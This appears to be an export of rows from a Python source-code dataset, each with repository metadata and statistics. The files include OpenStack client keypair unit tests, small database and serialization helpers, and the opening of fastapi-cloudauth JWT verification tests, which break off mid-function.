| 0.031193
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.037037
| 0
| 0.185185
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
625c4d51d2d396a4288002807afc375a0d4f106a
| 289
|
py
|
Python
|
app/database/company.py
|
hngyb/Finance-QA
|
1cf41a19e963a2566c7f6ee637e6a87b498032bb
|
[
"MIT"
] | 6
|
2021-08-02T10:56:16.000Z
|
2021-12-26T09:10:03.000Z
|
app/database/company.py
|
hngyb/Finance-QA
|
1cf41a19e963a2566c7f6ee637e6a87b498032bb
|
[
"MIT"
] | null | null | null |
app/database/company.py
|
hngyb/Finance-QA
|
1cf41a19e963a2566c7f6ee637e6a87b498032bb
|
[
"MIT"
] | 6
|
2021-06-26T17:05:12.000Z
|
2021-08-25T06:37:52.000Z
|
from sqlalchemy.orm import Session
import app.database.schema as models
def get_all_companies(db: Session):
return db.query(models.Company).all()
def get_company_code(db: Session, name):
return db.query(models.Company.stock_code).filter(models.Company.company_name == name).all()
| 36.125
| 96
| 0.778547
| 44
| 289
| 4.977273
| 0.5
| 0.178082
| 0.118721
| 0.173516
| 0.237443
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.103806
| 289
| 8
| 96
| 36.125
| 0.84556
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
62824852bdd44d724eb95fc4cf6c741e79fbd8ea
| 24
|
py
|
Python
|
slickml/optimization.py
|
amirhessam88/slick-ml
|
d8ffb46eeb7acc3f6e3a4b6ca80acfaaecb20b44
|
[
"MIT"
] | null | null | null |
slickml/optimization.py
|
amirhessam88/slick-ml
|
d8ffb46eeb7acc3f6e3a4b6ca80acfaaecb20b44
|
[
"MIT"
] | 1
|
2020-08-31T02:19:21.000Z
|
2020-08-31T02:19:21.000Z
|
slickml/optimization.py
|
amirhessam88/slick-ml
|
d8ffb46eeb7acc3f6e3a4b6ca80acfaaecb20b44
|
[
"MIT"
] | 1
|
2020-08-31T02:20:55.000Z
|
2020-08-31T02:20:55.000Z
|
# TODO: optimization.py
| 12
| 23
| 0.75
| 3
| 24
| 6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 24
| 1
| 24
| 24
| 0.857143
| 0.875
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 1
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
65b59093dc69c1ca25ad2c6c640bda5c5e1b8925
| 31
|
py
|
Python
|
python/testData/refactoring/changeSignature/duplicateNamesOfStarredParameters.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 2
|
2019-04-28T07:48:50.000Z
|
2020-12-11T14:18:08.000Z
|
python/testData/refactoring/changeSignature/duplicateNamesOfStarredParameters.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 173
|
2018-07-05T13:59:39.000Z
|
2018-08-09T01:12:03.000Z
|
python/testData/refactoring/changeSignature/duplicateNamesOfStarredParameters.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
def func(*foo, **bar):
pass
| 15.5
| 22
| 0.548387
| 5
| 31
| 3.4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.225806
| 31
| 2
| 23
| 15.5
| 0.708333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0.5
| 0
| 0
| 0.5
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 6
|
65d9396aee1e56ad579a8617e2e2d7497c781d9a
| 25,223
|
py
|
Python
|
openstackclient/tests/unit/compute/v2/test_keypair.py
|
mydevice/python-openstackclient
|
4891bb38208fdcd1a2ae60e47b056841e14fbdf7
|
[
"Apache-2.0"
] | 262
|
2015-01-29T20:10:49.000Z
|
2022-03-23T01:59:23.000Z
|
openstackclient/tests/unit/compute/v2/test_keypair.py
|
mydevice/python-openstackclient
|
4891bb38208fdcd1a2ae60e47b056841e14fbdf7
|
[
"Apache-2.0"
] | 5
|
2015-01-21T02:37:35.000Z
|
2021-11-23T02:26:00.000Z
|
openstackclient/tests/unit/compute/v2/test_keypair.py
|
mydevice/python-openstackclient
|
4891bb38208fdcd1a2ae60e47b056841e14fbdf7
|
[
"Apache-2.0"
] | 194
|
2015-01-08T07:39:27.000Z
|
2022-03-30T13:51:23.000Z
|
# Copyright 2016 IBM
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import copy
from unittest import mock
from unittest.mock import call
import uuid
from novaclient import api_versions
from openstack import utils as sdk_utils
from osc_lib import exceptions
from openstackclient.compute.v2 import keypair
from openstackclient.tests.unit.compute.v2 import fakes as compute_fakes
from openstackclient.tests.unit import fakes
from openstackclient.tests.unit.identity.v2_0 import fakes as identity_fakes
from openstackclient.tests.unit import utils as tests_utils
class TestKeypair(compute_fakes.TestComputev2):
def setUp(self):
super(TestKeypair, self).setUp()
# Initialize the user mock
self.users_mock = self.app.client_manager.identity.users
self.users_mock.reset_mock()
self.users_mock.get.return_value = fakes.FakeResource(
None,
copy.deepcopy(identity_fakes.USER),
loaded=True,
)
self.app.client_manager.sdk_connection = mock.Mock()
self.app.client_manager.sdk_connection.compute = mock.Mock()
self.sdk_client = self.app.client_manager.sdk_connection.compute
self.sdk_client.keypairs = mock.Mock()
self.sdk_client.create_keypair = mock.Mock()
self.sdk_client.delete_keypair = mock.Mock()
self.sdk_client.find_keypair = mock.Mock()
class TestKeypairCreate(TestKeypair):
keypair = compute_fakes.FakeKeypair.create_one_keypair()
def setUp(self):
super(TestKeypairCreate, self).setUp()
self.columns = (
'fingerprint',
'name',
'type',
'user_id'
)
self.data = (
self.keypair.fingerprint,
self.keypair.name,
self.keypair.type,
self.keypair.user_id
)
# Get the command object to test
self.cmd = keypair.CreateKeypair(self.app, None)
self.sdk_client.create_keypair.return_value = self.keypair
def test_key_pair_create_no_options(self):
arglist = [
self.keypair.name,
]
verifylist = [
('name', self.keypair.name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
columns, data = self.cmd.take_action(parsed_args)
self.sdk_client.create_keypair.assert_called_with(
name=self.keypair.name
)
self.assertEqual({}, columns)
self.assertEqual({}, data)
def test_keypair_create_public_key(self):
# overwrite the setup one because we want to omit private_key
self.keypair = compute_fakes.FakeKeypair.create_one_keypair(
no_pri=True)
self.sdk_client.create_keypair.return_value = self.keypair
self.data = (
self.keypair.fingerprint,
self.keypair.name,
self.keypair.type,
self.keypair.user_id
)
arglist = [
'--public-key', self.keypair.public_key,
self.keypair.name,
]
verifylist = [
('public_key', self.keypair.public_key),
('name', self.keypair.name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
with mock.patch('io.open') as mock_open:
mock_open.return_value = mock.MagicMock()
m_file = mock_open.return_value.__enter__.return_value
m_file.read.return_value = 'dummy'
columns, data = self.cmd.take_action(parsed_args)
self.sdk_client.create_keypair.assert_called_with(
name=self.keypair.name,
public_key=self.keypair.public_key,
)
self.assertEqual(self.columns, columns)
self.assertEqual(self.data, data)
def test_keypair_create_private_key(self):
tmp_pk_file = '/tmp/kp-file-' + uuid.uuid4().hex
arglist = [
'--private-key', tmp_pk_file,
self.keypair.name,
]
verifylist = [
('private_key', tmp_pk_file),
('name', self.keypair.name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
with mock.patch('io.open') as mock_open:
mock_open.return_value = mock.MagicMock()
m_file = mock_open.return_value.__enter__.return_value
columns, data = self.cmd.take_action(parsed_args)
self.sdk_client.create_keypair.assert_called_with(
name=self.keypair.name,
)
mock_open.assert_called_once_with(tmp_pk_file, 'w+')
m_file.write.assert_called_once_with(self.keypair.private_key)
self.assertEqual(self.columns, columns)
self.assertEqual(self.data, data)
@mock.patch.object(sdk_utils, 'supports_microversion', return_value=True)
def test_keypair_create_with_key_type(self, sm_mock):
for key_type in ['x509', 'ssh']:
self.keypair = compute_fakes.FakeKeypair.create_one_keypair(
no_pri=True)
self.sdk_client.create_keypair.return_value = self.keypair
self.data = (
self.keypair.fingerprint,
self.keypair.name,
self.keypair.type,
self.keypair.user_id,
)
arglist = [
'--public-key', self.keypair.public_key,
self.keypair.name,
'--type', key_type,
]
verifylist = [
('public_key', self.keypair.public_key),
('name', self.keypair.name),
('type', key_type),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
with mock.patch('io.open') as mock_open:
mock_open.return_value = mock.MagicMock()
m_file = mock_open.return_value.__enter__.return_value
m_file.read.return_value = 'dummy'
columns, data = self.cmd.take_action(parsed_args)
self.sdk_client.create_keypair.assert_called_with(
name=self.keypair.name,
public_key=self.keypair.public_key,
key_type=key_type,
)
self.assertEqual(self.columns, columns)
self.assertEqual(self.data, data)
@mock.patch.object(sdk_utils, 'supports_microversion', return_value=False)
def test_keypair_create_with_key_type_pre_v22(self, sm_mock):
for key_type in ['x509', 'ssh']:
arglist = [
'--public-key', self.keypair.public_key,
self.keypair.name,
'--type', 'ssh',
]
verifylist = [
('public_key', self.keypair.public_key),
('name', self.keypair.name),
('type', 'ssh'),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
with mock.patch('io.open') as mock_open:
mock_open.return_value = mock.MagicMock()
m_file = mock_open.return_value.__enter__.return_value
m_file.read.return_value = 'dummy'
ex = self.assertRaises(
exceptions.CommandError,
self.cmd.take_action,
parsed_args)
self.assertIn(
'--os-compute-api-version 2.2 or greater is required',
str(ex))
@mock.patch.object(sdk_utils, 'supports_microversion', return_value=True)
def test_key_pair_create_with_user(self, sm_mock):
arglist = [
'--user', identity_fakes.user_name,
self.keypair.name,
]
verifylist = [
('user', identity_fakes.user_name),
('name', self.keypair.name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
columns, data = self.cmd.take_action(parsed_args)
self.sdk_client.create_keypair.assert_called_with(
name=self.keypair.name,
user_id=identity_fakes.user_id,
)
self.assertEqual({}, columns)
self.assertEqual({}, data)
@mock.patch.object(sdk_utils, 'supports_microversion', return_value=False)
def test_key_pair_create_with_user_pre_v210(self, sm_mock):
arglist = [
'--user', identity_fakes.user_name,
self.keypair.name,
]
verifylist = [
('user', identity_fakes.user_name),
('name', self.keypair.name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
ex = self.assertRaises(
exceptions.CommandError,
self.cmd.take_action,
parsed_args)
self.assertIn(
'--os-compute-api-version 2.10 or greater is required', str(ex))
class TestKeypairDelete(TestKeypair):
keypairs = compute_fakes.FakeKeypair.create_keypairs(count=2)
def setUp(self):
super(TestKeypairDelete, self).setUp()
self.cmd = keypair.DeleteKeypair(self.app, None)
def test_keypair_delete(self):
arglist = [
self.keypairs[0].name
]
verifylist = [
('name', [self.keypairs[0].name]),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
ret = self.cmd.take_action(parsed_args)
self.assertIsNone(ret)
self.sdk_client.delete_keypair.assert_called_with(
self.keypairs[0].name, ignore_missing=False)
def test_delete_multiple_keypairs(self):
arglist = []
for k in self.keypairs:
arglist.append(k.name)
verifylist = [
('name', arglist),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
result = self.cmd.take_action(parsed_args)
calls = []
for k in self.keypairs:
calls.append(call(k.name, ignore_missing=False))
self.sdk_client.delete_keypair.assert_has_calls(calls)
self.assertIsNone(result)
def test_delete_multiple_keypairs_with_exception(self):
arglist = [
self.keypairs[0].name,
'unexist_keypair',
]
verifylist = [
('name', arglist),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
self.sdk_client.delete_keypair.side_effect = [
None, exceptions.CommandError]
try:
self.cmd.take_action(parsed_args)
self.fail('CommandError should be raised.')
except exceptions.CommandError as e:
self.assertEqual('1 of 2 keys failed to delete.', str(e))
calls = []
for k in arglist:
calls.append(call(k, ignore_missing=False))
self.sdk_client.delete_keypair.assert_has_calls(calls)
@mock.patch.object(sdk_utils, 'supports_microversion', return_value=True)
def test_keypair_delete_with_user(self, sm_mock):
arglist = [
'--user', identity_fakes.user_name,
self.keypairs[0].name
]
verifylist = [
('user', identity_fakes.user_name),
('name', [self.keypairs[0].name]),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
ret = self.cmd.take_action(parsed_args)
self.assertIsNone(ret)
self.sdk_client.delete_keypair.assert_called_with(
self.keypairs[0].name,
user_id=identity_fakes.user_id,
ignore_missing=False
)
@mock.patch.object(sdk_utils, 'supports_microversion', return_value=False)
def test_keypair_delete_with_user_pre_v210(self, sm_mock):
self.app.client_manager.compute.api_version = \
api_versions.APIVersion('2.9')
arglist = [
'--user', identity_fakes.user_name,
self.keypairs[0].name
]
verifylist = [
('user', identity_fakes.user_name),
('name', [self.keypairs[0].name]),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
ex = self.assertRaises(
exceptions.CommandError,
self.cmd.take_action,
parsed_args)
self.assertIn(
'--os-compute-api-version 2.10 or greater is required', str(ex))
class TestKeypairList(TestKeypair):
# Return value of self.sdk_client.keypairs().
keypairs = compute_fakes.FakeKeypair.create_keypairs(count=1)
def setUp(self):
super(TestKeypairList, self).setUp()
self.sdk_client.keypairs.return_value = self.keypairs
# Get the command object to test
self.cmd = keypair.ListKeypair(self.app, None)
@mock.patch.object(sdk_utils, 'supports_microversion', return_value=False)
def test_keypair_list_no_options(self, sm_mock):
arglist = []
verifylist = []
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
# In base command class Lister in cliff, abstract method take_action()
# returns a tuple containing the column names and an iterable
# containing the data to be listed.
columns, data = self.cmd.take_action(parsed_args)
# Set expected values
self.sdk_client.keypairs.assert_called_with()
self.assertEqual(('Name', 'Fingerprint'), columns)
self.assertEqual(
((self.keypairs[0].name, self.keypairs[0].fingerprint), ),
tuple(data)
)
@mock.patch.object(sdk_utils, 'supports_microversion', return_value=True)
def test_keypair_list_v22(self, sm_mock):
arglist = []
verifylist = []
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
# In base command class Lister in cliff, abstract method take_action()
# returns a tuple containing the column names and an iterable
# containing the data to be listed.
columns, data = self.cmd.take_action(parsed_args)
# Set expected values
self.sdk_client.keypairs.assert_called_with()
self.assertEqual(('Name', 'Fingerprint', 'Type'), columns)
self.assertEqual(
((
self.keypairs[0].name,
self.keypairs[0].fingerprint,
self.keypairs[0].type,
), ),
tuple(data)
)
@mock.patch.object(sdk_utils, 'supports_microversion', return_value=True)
def test_keypair_list_with_user(self, sm_mock):
users_mock = self.app.client_manager.identity.users
users_mock.reset_mock()
users_mock.get.return_value = fakes.FakeResource(
None,
copy.deepcopy(identity_fakes.USER),
loaded=True,
)
arglist = [
'--user', identity_fakes.user_name,
]
verifylist = [
('user', identity_fakes.user_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
columns, data = self.cmd.take_action(parsed_args)
users_mock.get.assert_called_with(identity_fakes.user_name)
self.sdk_client.keypairs.assert_called_with(
user_id=identity_fakes.user_id,
)
self.assertEqual(('Name', 'Fingerprint', 'Type'), columns)
self.assertEqual(
((
self.keypairs[0].name,
self.keypairs[0].fingerprint,
self.keypairs[0].type,
), ),
tuple(data)
)
@mock.patch.object(sdk_utils, 'supports_microversion', return_value=False)
def test_keypair_list_with_user_pre_v210(self, sm_mock):
arglist = [
'--user', identity_fakes.user_name,
]
verifylist = [
('user', identity_fakes.user_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
ex = self.assertRaises(
exceptions.CommandError,
self.cmd.take_action,
parsed_args)
self.assertIn(
'--os-compute-api-version 2.10 or greater is required', str(ex))
@mock.patch.object(sdk_utils, 'supports_microversion', return_value=True)
def test_keypair_list_with_project(self, sm_mock):
projects_mock = self.app.client_manager.identity.tenants
projects_mock.reset_mock()
projects_mock.get.return_value = fakes.FakeResource(
None,
copy.deepcopy(identity_fakes.PROJECT),
loaded=True,
)
users_mock = self.app.client_manager.identity.users
users_mock.reset_mock()
users_mock.list.return_value = [
fakes.FakeResource(
None,
copy.deepcopy(identity_fakes.USER),
loaded=True,
),
]
arglist = ['--project', identity_fakes.project_name]
verifylist = [('project', identity_fakes.project_name)]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
columns, data = self.cmd.take_action(parsed_args)
projects_mock.get.assert_called_with(identity_fakes.project_name)
users_mock.list.assert_called_with(tenant_id=identity_fakes.project_id)
self.sdk_client.keypairs.assert_called_with(
user_id=identity_fakes.user_id,
)
self.assertEqual(('Name', 'Fingerprint', 'Type'), columns)
self.assertEqual(
((
self.keypairs[0].name,
self.keypairs[0].fingerprint,
self.keypairs[0].type,
), ),
tuple(data)
)
@mock.patch.object(sdk_utils, 'supports_microversion', return_value=False)
def test_keypair_list_with_project_pre_v210(self, sm_mock):
arglist = ['--project', identity_fakes.project_name]
verifylist = [('project', identity_fakes.project_name)]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
ex = self.assertRaises(
exceptions.CommandError,
self.cmd.take_action,
parsed_args)
self.assertIn(
'--os-compute-api-version 2.10 or greater is required', str(ex))
def test_keypair_list_conflicting_user_options(self):
arglist = [
'--user', identity_fakes.user_name,
'--project', identity_fakes.project_name,
]
self.assertRaises(
tests_utils.ParserException,
self.check_parser, self.cmd, arglist, None)
@mock.patch.object(
sdk_utils, 'supports_microversion', new=mock.Mock(return_value=True))
def test_keypair_list_with_limit(self):
arglist = [
'--limit', '1',
]
verifylist = [
('limit', 1),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
self.cmd.take_action(parsed_args)
self.sdk_client.keypairs.assert_called_with(limit=1)
@mock.patch.object(
sdk_utils, 'supports_microversion', new=mock.Mock(return_value=False))
def test_keypair_list_with_limit_pre_v235(self):
arglist = [
'--limit', '1',
]
verifylist = [
('limit', 1),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
ex = self.assertRaises(
exceptions.CommandError,
self.cmd.take_action,
parsed_args)
self.assertIn(
'--os-compute-api-version 2.35 or greater is required', str(ex))
@mock.patch.object(
sdk_utils, 'supports_microversion', new=mock.Mock(return_value=True))
def test_keypair_list_with_marker(self):
arglist = [
'--marker', 'test_kp',
]
verifylist = [
('marker', 'test_kp'),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
self.cmd.take_action(parsed_args)
self.sdk_client.keypairs.assert_called_with(marker='test_kp')
@mock.patch.object(
sdk_utils, 'supports_microversion', new=mock.Mock(return_value=False))
def test_keypair_list_with_marker_pre_v235(self):
arglist = [
'--marker', 'test_kp',
]
verifylist = [
('marker', 'test_kp'),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
ex = self.assertRaises(
exceptions.CommandError,
self.cmd.take_action,
parsed_args)
self.assertIn(
'--os-compute-api-version 2.35 or greater is required', str(ex))
class TestKeypairShow(TestKeypair):
keypair = compute_fakes.FakeKeypair.create_one_keypair()
def setUp(self):
super(TestKeypairShow, self).setUp()
self.sdk_client.find_keypair.return_value = self.keypair
self.cmd = keypair.ShowKeypair(self.app, None)
self.columns = (
"fingerprint",
"name",
"type",
"user_id"
)
self.data = (
self.keypair.fingerprint,
self.keypair.name,
self.keypair.type,
self.keypair.user_id
)
def test_keypair_show_no_options(self):
arglist = []
verifylist = []
# Missing required args should boil here
self.assertRaises(tests_utils.ParserException, self.check_parser,
self.cmd, arglist, verifylist)
def test_keypair_show(self):
# overwrite the setup one because we want to omit private_key
self.keypair = compute_fakes.FakeKeypair.create_one_keypair(
no_pri=True)
self.sdk_client.find_keypair.return_value = self.keypair
self.data = (
self.keypair.fingerprint,
self.keypair.name,
self.keypair.type,
self.keypair.user_id
)
arglist = [
self.keypair.name
]
verifylist = [
('name', self.keypair.name)
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
columns, data = self.cmd.take_action(parsed_args)
self.sdk_client.find_keypair.assert_called_with(
self.keypair.name,
ignore_missing=False
)
self.assertEqual(self.columns, columns)
self.assertEqual(self.data, data)
def test_keypair_show_public(self):
arglist = [
'--public-key',
self.keypair.name
]
verifylist = [
('public_key', True),
('name', self.keypair.name)
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
columns, data = self.cmd.take_action(parsed_args)
self.assertEqual({}, columns)
self.assertEqual({}, data)
@mock.patch.object(sdk_utils, 'supports_microversion', return_value=True)
def test_keypair_show_with_user(self, sm_mock):
# overwrite the setup one because we want to omit private_key
self.keypair = compute_fakes.FakeKeypair.create_one_keypair(
no_pri=True)
self.sdk_client.find_keypair.return_value = self.keypair
self.data = (
self.keypair.fingerprint,
self.keypair.name,
self.keypair.type,
self.keypair.user_id
)
arglist = [
'--user', identity_fakes.user_name,
self.keypair.name,
]
verifylist = [
('user', identity_fakes.user_name),
('name', self.keypair.name)
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
columns, data = self.cmd.take_action(parsed_args)
self.users_mock.get.assert_called_with(identity_fakes.user_name)
self.sdk_client.find_keypair.assert_called_with(
self.keypair.name,
ignore_missing=False,
user_id=identity_fakes.user_id
)
self.assertEqual(self.columns, columns)
self.assertEqual(self.data, data)
@mock.patch.object(sdk_utils, 'supports_microversion', return_value=False)
def test_keypair_show_with_user_pre_v210(self, sm_mock):
arglist = [
'--user', identity_fakes.user_name,
self.keypair.name,
]
verifylist = [
('user', identity_fakes.user_name),
('name', self.keypair.name)
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
ex = self.assertRaises(
exceptions.CommandError,
self.cmd.take_action,
parsed_args)
self.assertIn(
'--os-compute-api-version 2.10 or greater is required', str(ex))
| 32.337179
| 79
| 0.603021
| 2,819
| 25,223
| 5.160695
| 0.086556
| 0.05444
| 0.04523
| 0.036569
| 0.847058
| 0.817432
| 0.786225
| 0.760654
| 0.750825
| 0.738177
| 0
| 0.005569
| 0.295246
| 25,223
| 779
| 80
| 32.378691
| 0.812838
| 0.050549
| 0
| 0.660473
| 0
| 0
| 0.062053
| 0.023834
| 0
| 0
| 0
| 0
| 0.116554
| 1
| 0.055743
| false
| 0
| 0.02027
| 0
| 0.091216
| 0.027027
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
65df0cea78bb12eea944b23b080faf9370bf7b47
| 151
|
py
|
Python
|
vpbuf/examples/uno/rel1/python/vp_uno/__init__.py
|
markraley/versioned-polymorphic-buffers
|
c2f0424f05013cfcaf5a55464846e9bcf26818e2
|
[
"MIT"
] | null | null | null |
vpbuf/examples/uno/rel1/python/vp_uno/__init__.py
|
markraley/versioned-polymorphic-buffers
|
c2f0424f05013cfcaf5a55464846e9bcf26818e2
|
[
"MIT"
] | null | null | null |
vpbuf/examples/uno/rel1/python/vp_uno/__init__.py
|
markraley/versioned-polymorphic-buffers
|
c2f0424f05013cfcaf5a55464846e9bcf26818e2
|
[
"MIT"
] | null | null | null |
from pyamf import amf3
def write_int(ver, f, payload):
f.writeInteger(payload)
def write_str(ver, f, payload):
f.writeString(payload)
| 18.875
| 32
| 0.688742
| 22
| 151
| 4.636364
| 0.590909
| 0.156863
| 0.215686
| 0.235294
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008333
| 0.205298
| 151
| 7
| 33
| 21.571429
| 0.841667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0.2
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 6
|
02b646bf1df14509751ad744af724a5137d7ee6e
| 244
|
py
|
Python
|
src/pylo/engines/prolog/__init__.py
|
olympus112/pylo2
|
cfbe29d1c2f8eead0193ee2d024090555407c528
|
[
"MIT"
] | 80
|
2020-10-20T14:25:28.000Z
|
2022-02-27T14:29:24.000Z
|
src/pylo/engines/prolog/__init__.py
|
olympus112/pylo2
|
cfbe29d1c2f8eead0193ee2d024090555407c528
|
[
"MIT"
] | 8
|
2020-10-20T14:16:55.000Z
|
2021-03-19T13:51:54.000Z
|
src/pylo/engines/prolog/__init__.py
|
olympus112/pylo2
|
cfbe29d1c2f8eead0193ee2d024090555407c528
|
[
"MIT"
] | 7
|
2020-10-21T21:01:31.000Z
|
2021-09-29T09:57:14.000Z
|
try:
from .GnuProlog import GNUProlog
except Exception:
pass
try:
from .SWIProlog import SWIProlog
except Exception:
pass
try:
from .XSBProlog import XSBProlog
except Exception:
pass
from .prologsolver import Prolog
| 13.555556
| 36
| 0.729508
| 28
| 244
| 6.357143
| 0.392857
| 0.117978
| 0.320225
| 0.247191
| 0.292135
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.229508
| 244
| 17
| 37
| 14.352941
| 0.946809
| 0
| 0
| 0.692308
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.230769
| 0.307692
| 0
| 0.307692
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
|
0
| 6
|
02d485c604f71fd56d535ce8450d9d0081ccfec1
| 8,000
|
py
|
Python
|
tests/test_verification.py
|
jleclanche/fastapi-cloudauth
|
9c098f91f46d9d927e1f10b82b80340951d0b1f2
|
[
"MIT"
] | 198
|
2020-08-05T06:40:58.000Z
|
2022-03-26T06:54:24.000Z
|
tests/test_verification.py
|
jleclanche/fastapi-cloudauth
|
9c098f91f46d9d927e1f10b82b80340951d0b1f2
|
[
"MIT"
] | 56
|
2020-08-26T11:41:49.000Z
|
2022-02-12T22:55:53.000Z
|
tests/test_verification.py
|
jleclanche/fastapi-cloudauth
|
9c098f91f46d9d927e1f10b82b80340951d0b1f2
|
[
"MIT"
] | 36
|
2020-08-02T06:19:34.000Z
|
2022-03-07T21:02:54.000Z
|
from datetime import datetime, timedelta
import pytest
from fastapi import HTTPException
from fastapi.security import HTTPAuthorizationCredentials
from jose import jwt
from starlette.status import HTTP_401_UNAUTHORIZED
from fastapi_cloudauth import messages
from fastapi_cloudauth.verification import (
JWKS,
JWKsVerifier,
Operator,
ScopedJWKsVerifier,
)
from .helpers import _assert_verifier, _assert_verifier_no_error
@pytest.mark.unittest
def test_malformed_token_handling():
http_auth_with_malformed_token = HTTPAuthorizationCredentials(
scheme="a", credentials="malformed-token",
)
verifier = JWKsVerifier(jwks=JWKS(keys=[]))
with pytest.raises(HTTPException):
verifier._get_publickey(http_auth_with_malformed_token)
with pytest.raises(HTTPException):
verifier.verify_token(http_auth_with_malformed_token)
verifier = JWKsVerifier(jwks=JWKS(keys=[]), auto_error=False)
assert not verifier._get_publickey(http_auth_with_malformed_token)
assert not verifier.verify_token(http_auth_with_malformed_token)
verifier = ScopedJWKsVerifier(jwks=JWKS(keys=[]))
with pytest.raises(HTTPException):
verifier._verify_scope(http_auth_with_malformed_token)
with pytest.raises(HTTPException):
verifier.verify_token(http_auth_with_malformed_token)
verifier = ScopedJWKsVerifier(jwks=JWKS(keys=[]), auto_error=False)
assert not verifier._verify_scope(http_auth_with_malformed_token)
assert not verifier.verify_token(http_auth_with_malformed_token)
@pytest.mark.unittest
def test_verify_scope_exeption(mocker):
mocker.patch(
"fastapi_cloudauth.verification.jwt.get_unverified_claims",
return_value={"dummy key": "read:test"},
)
